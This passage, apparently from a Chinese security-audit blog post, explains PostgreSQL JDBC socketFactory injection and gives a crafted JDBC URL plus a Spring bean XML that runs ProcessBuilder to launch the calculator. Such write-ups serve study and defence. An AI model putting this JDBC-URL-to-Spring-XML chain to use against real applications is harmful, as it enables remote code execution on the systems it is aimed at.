<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> SQLException &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">jdbcUrl</span> <span class="operator">=</span> <span class="string">&quot;jdbc:postgresql://127.0.0.1:5432/test/?socketFactory=&amp;socketFactoryArg=&quot;</span>;</span><br><span class="line">  			</span><br><span class="line">        DriverManager.getConnection(jdbcUrl);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>我们看看sink点instantiate方法，可以发现通过反射去实例化对象。注意cls.getConstructor(String.class);，也就是我们需要找到一个构造方法只有一个String形参的恶意类。参考p神（<a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/springboot-xml-beans-exploit-without-network.html%EF%BC%89%E3%80%82%E2%80%9C%E8%BF%99%E4%B8%A4%E4%B8%AA%E7%B1%BB%E6%98%AFSpring%E4%B8%AD%E7%94%A8%E4%BA%8E%E5%8A%A0%E8%BD%BDXML%E6%A0%BC%E5%BC%8F%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E7%9A%84%E7%B1%BB%EF%BC%8C%E7%94%B1%E4%BA%8E%E5%85%B6%E4%B8%AD%E5%8F%AF%E4%BB%A5%E5%AE%9E%E4%BE%8B%E5%8C%96%E5%AF%B9%E8%B1%A1%E3%80%81%E8%B0%83%E7%94%A8%E9%9D%99%E6%80%81%E6%96%B9%E6%B3%95%EF%BC%8C%E9%80%9A%E5%B8%B8%E4%BC%9A%E4%BD%9C%E4%B8%BA%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E7%9A%84%E4%B8%80%E4%B8%AA%E9%87%8D%E8%A6%81%E5%88%A9%E7%94%A8%E9%93%BE%E3%80%82%E4%B8%8D%E8%BF%87%E8%BF%99%E4%B8%A4%E4%B8%AA%E7%B1%BB%E5%8F%AA%E8%83%BD%E5%8A%A0%E8%BD%BDURL%EF%BC%8C%E6%97%A0%E6%B3%95%E7%9B%B4%E6%8E%A5%E5%B0%86XML%E4%BC%A0%E5%85%A5%EF%BC%8C%E6%88%91%E4%BB%AC%E9%80%9A%E5%B8%B8%E8%AE%A4%E4%B8%BA%E9%9C%80%E8%A6%81%E5%8A%A0%E8%BD%BD%E8%BF%9C%E7%A8%8BXML%E6%96%87%E4%BB%B6%EF%BC%8C%E6%88%96%E8%80%85%E5%85%88%E9%80%9A%E8%BF%87%E6%9C%AC%E5%9C%B0%E5%86%99%E6%96%87%E4%BB%B6%E6%89%8D%E8%83%BD%E5%88%A9%E7%94%A8%E3%80%82%E2%80%9D">https://www.leavesongs.com/PENETRATION/springboot-xml-beans-exploit-without-network.html）。“这两个类是Spring中用于加载XML格式配置文件的类，由于其中可以实例化对象、调用静态方法，通常会作为漏洞利用的一个重要利用链。不过这两个类只能加载URL，无法直接将XML传入，我们通常认为需要加载远程XML文件，或者先通过本地写文件才能利用。”</a></p>
<ul>
<li><p>org.springframework.context.support.ClassPathXmlApplicationContext</p>
</li>
<li><p>org.springframework.context.support.FileSystemXmlApplicationContext</p>
<p>这里classname是我们可控的。</p>
</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">instantiate</span><span class="params">(String classname, Properties info, <span class="type">boolean</span> tryString, String stringarg)</span> <span class="keyword">throws</span> ClassNotFoundException, SecurityException, NoSuchMethodException, IllegalArgumentException, InstantiationException, IllegalAccessException, InvocationTargetException &#123;</span><br><span class="line">        Object[] args = <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;info&#125;;</span><br><span class="line">        Constructor&lt;?&gt; ctor = <span class="literal">null</span>;</span><br><span class="line">        Class&lt;?&gt; cls = Class.forName(classname);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            ctor = cls.getConstructor(Properties.class);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (NoSuchMethodException var9) &#123;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (tryString &amp;&amp; ctor == <span class="literal">null</span>) &#123;</span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                ctor = cls.getConstructor(String.class);</span><br><span class="line">                args = <span class="keyword">new</span> <span class="title class_">String</span>[]&#123;stringarg&#125;;</span><br><span class="line">            &#125; <span class="keyword">catch</span> (NoSuchMethodException var8) &#123;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (ctor == <span class="literal">null</span>) &#123;</span><br><span class="line">            ctor = cls.getConstructor();</span><br><span class="line">            args = <span class="keyword">new</span> <span class="title class_">Object</span>[<span class="number">0</span>];</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> ctor.newInstance(args);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>?socketFactory&#x3D;恶意类名&amp;socketFactoryArg&#x3D;其构造器的参数。python起服务，放入xml，再运行，成功弹计算器。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> SQLException &#123;</span><br><span class="line">    <span class="type">String</span> <span class="variable">jdbcUrl</span> <span class="operator">=</span> <span class="string">&quot;jdbc:postgresql://127.0.0.1:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&amp;socketFactoryArg=http://localhost/2.xml&quot;</span>;</span><br><span class="line">    DriverManager.getConnection(jdbcUrl);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span> ?&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">beans</span> <span class="attr">xmlns</span>=<span class="string">&quot;http://www.springframework.org/schema/beans&quot;</span></span></span><br><span class="line"><span class="tag">       <span class="attr">xmlns:xsi</span>=<span class="string">&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span></span></span><br><span class="line"><span class="tag">       <span class="attr">xsi:schemaLocation</span>=<span class="string">&quot;</span></span></span><br><span class="line"><span class="string"><span class="tag">     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">bean</span> <span class="attr">id</span>=<span class="string">&quot;pb&quot;</span> <span class="attr">class</span>=<span class="string">&quot;java.lang.ProcessBuilder&quot;</span> <span class="attr">init-method</span>=<span class="string">&quot;start&quot;</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">constructor-arg</span> &gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">list</span>&gt;</span></span><br><span class="line">                <span class="tag">&lt;<span class="name">value</span>&gt;</span>open<span class="tag">&lt;/<span class="name">value</span>&gt;</span></span><br><span class="line">                <span class="tag">&lt;<span class="name">value</span>&gt;</span>-a<span class="tag">&lt;/<span class="name">value</span>&gt;</span></span><br><span class="line">                <span class="tag">&lt;<span class="name">value</span>&gt;</span>calculator<span class="tag">&lt;/<span class="name">value</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;/<span class="name">list</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;/<span class="name">constructor-arg</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">bean</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">beans</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="/images/8.png" alt="image-20250724170036442"></p>
<p>sslFactory也是差不多的流程，都是在instantiate方法中可控实例化对象。</p>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>feverwizard
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://askqiu.github.io/2025/07/25/java-sec-code%E4%B9%8B%E5%85%A5%E9%97%A8%E5%AE%A1%E8%AE%A1%EF%BC%88%E4%B8%80%EF%BC%89/" title="java-sec-code之入门审计（一）">https://askqiu.github.io/2025/07/25/java-sec-code之入门审计（一）/</a>
  </li>
  <li class="post-copyright-license">
      <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/07/16/hello-world/" rel="prev" title="Hello World">
                  <i class="fa fa-angle-left"></i> Hello World
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">feverwizard</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">2k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">7 分钟</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/mist/" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>
<script>
  window.Live2DWidget = {
    model: {
      // 这是 miku 的模型 JSON 文件，直接用 CDN 地址最方便
      jsonPath: "https://unpkg.com/live2d-widget-model-miku@1.0.5/assets/miku.model.json"
    },
    display: {
      position: "right",    // 右下角（默认）
      width: 150,           // 小人宽度，想大一点可调大
      height: 300,          // 小人高度
      hOffset: 100,           // 水平偏移
      vOffset: -20          // 垂直偏移（往下压一点，避免挡住内容）
    },
    mobile: {
      show: true,           // 手机端也显示
      scale: 0.5            // 手机上缩小一半
    }
  };
</script>
<script src="https://fastly.jsdelivr.net/gh/stevenjoezhang/live2d-widget@latest/autoload.js"></script>
</body>
</html>
